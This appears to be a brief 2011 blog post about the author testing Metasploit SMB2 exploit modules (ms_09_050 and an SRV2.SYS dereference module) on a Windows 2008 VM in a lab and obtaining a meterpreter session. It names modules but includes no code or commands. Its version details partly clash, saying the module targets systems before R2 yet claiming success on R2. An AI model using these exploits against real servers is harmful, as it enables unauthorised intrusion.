03/15/11 metasploit attack on Windows 2008 R2 Server
While reading an article on Attacking an Unpatched Windows 2008 Server I wanted to try the exploit on an VM of Windows 2008 service pack 2 NL (Netherland). Now the two exploits that are described in the article ms_09_050_smb2_negotiate_pidhigh and ms_09_050_smb2_session_logoff are to cause the OS to Blue Screen. I tried this with the Netherland version of Microsoft 2008 R2 and had no luck getting the OS to Blue Screen. So I decided to try other similar exploits such as Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference and I got lucky. This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw. What is interesting is this exploit was used against Windows 2008 Server R2 (Netherland) and I was able to gain a meterpreter session.
<object width="425" height="344">
|Return to Home|